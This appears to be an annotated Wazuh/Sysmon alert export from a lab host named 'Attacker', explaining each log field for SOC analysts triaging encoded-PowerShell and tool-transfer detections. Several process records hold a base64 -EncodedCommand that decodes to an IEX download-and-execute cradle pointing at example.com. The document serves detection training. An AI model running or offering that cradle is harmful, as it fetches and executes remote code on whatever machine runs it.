data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1b2-680a-0a0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9788
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:58.805+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:58.805+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  141
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535418.2942275
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:57.0976263Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351055
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:57.052 ProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} ProcessId: 13984 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1 CreationUtcTime: 2025-04-24 22:56:57.052 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:57.052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1b7-680a-0c0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2jg0gk4w.yqo.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:57.052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:02.278+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:02.278+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  138
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535422.2945044
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:00.2839410Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351088
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:58.730 ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} ProcessId: 16768 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1b7-680a-0c0d-000000000e00} ParentProcessId: 13984 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:58.730
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1ba-680a-0e0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16768
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c1b7-680a-0c0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13984
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:03.194+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:03.194+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  142
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535423.2953115
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:00.5874879Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351089
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:57:00.548 ProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} ProcessId: 16768 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_x0prsnfi.525.ps1 CreationUtcTime: 2025-04-24 22:57:00.545 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:00.548
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1ba-680a-0e0d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16768
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_x0prsnfi.525.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:57:00.545
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:57:05.701+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:57:05.701+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  139
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535425.2955884
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:57:03.1389988Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  351116
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:57:01.866 ProcessGuid: {94294ddc-c1bd-680a-100d-000000000e00} ProcessId: 13568 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c1ba-680a-0e0d-000000000e00} ParentProcessId: 16768 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:57:01.866
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c1bd-680a-100d-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13568
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

